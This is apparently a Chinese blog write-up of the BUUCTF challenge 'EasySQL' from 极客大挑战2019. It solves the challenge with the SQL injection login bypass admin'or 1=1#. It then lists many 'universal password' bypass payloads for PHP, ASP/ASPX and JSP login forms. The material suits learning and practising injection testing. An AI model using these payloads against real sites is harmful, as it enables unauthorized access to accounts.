极客大挑战2019-EasySQL

 · 2020-5-29  ·次阅读


题目地址:buuctf

打开题目

QQ截图20200529123305

根据题目可以知道应该是个sql注入

先用万能密码尝试

用户名:admin’or 1=1#

密码:admin

登录成功,得到flag

QQ截图20200529123625

这里给出一些不同语言类型的万能密码

语言 万能密码
PHP ‘or 1=1/*
“or “a”=”a
“or 1=1–
“or”=”
“or”=”a’=’a
“or1=1–
“or=or”
‘’or’=’or’
‘) or (‘a’=’a
‘.).or.(‘.a.’=’.a
‘or 1=1
‘or 1=1–
‘or 1=1/*
‘or”=”a’=’a
‘or’ ‘1’=’1’
‘or’’=’
‘or’’=’’or’’=’
‘or’=’1’
‘or’=’or’
‘or.’a.’=’a
‘or1=1–
1’or’1’=’1
a’or’ 1=1–
a’or’1=1–
or ‘a’=’a’
or 1=1–
or1=1–
asp aspx “or “a”=”a
‘.).or.(‘.a.’=’.a
or 1=1–
‘or 1=1–
a’or’ 1=1–
“or 1=1–
‘or.’a.’=’a
“or”=”a’=’a
‘or’’=’
or’=’or’
jsp 1’or’1’=’1
admin’ or 1=1/*